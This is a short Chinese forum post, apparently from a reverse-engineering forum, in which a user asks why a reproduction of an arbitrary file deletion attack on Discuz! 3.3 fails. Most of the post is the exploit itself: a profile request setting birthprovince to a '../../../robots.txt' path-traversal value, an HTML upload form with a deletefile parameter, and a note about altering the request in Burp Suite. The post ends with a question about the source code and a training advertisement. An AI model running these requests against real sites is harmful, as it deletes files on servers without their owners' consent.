①构造提交
http://dz.com/3.3/home.php?mod=spacecp&ac=profile&op=base

 birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7


②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
 <inputtype="text"name="formhash"value="30ff14a7"/></p>
 <inputtype="text"name="profilesubmit"value="1"/></p>
 <inputtype="submit"value="Submit"/>
</form>

③burpsuite改包



问  ① ： 改了如图 请问哪里操作失误 才不行的
问 ②  ：spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)